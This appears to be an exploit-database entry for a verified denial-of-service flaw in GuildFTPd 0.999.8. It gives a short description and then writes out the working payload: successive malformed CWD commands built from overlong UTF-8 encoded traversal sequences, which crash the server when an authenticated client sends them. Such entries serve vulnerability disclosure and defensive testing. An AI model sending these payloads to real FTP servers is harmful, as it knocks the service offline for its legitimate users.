[] NeoSense

GuildFTPd 0.999.8 - 'CWD' Denial of Service

Author: dr_insane
type: dos
platform: windows
port: 
date_added: 2003-05-12 
date_updated: 2012-11-18 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7951/info

A denial of service condition exists in GuildFTPD that may allow a remote user to deny service to legitimate GuildFTPD users.

The denial of service occurs when the server receives several successive malformed CWD commands from an authenticated client.

CWD ..%c0%af....%c0%af....%c0%af....%c0%af....%c0%af....%c0%af..
CWD
\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..CWD /..%c0%af../..%c0%af../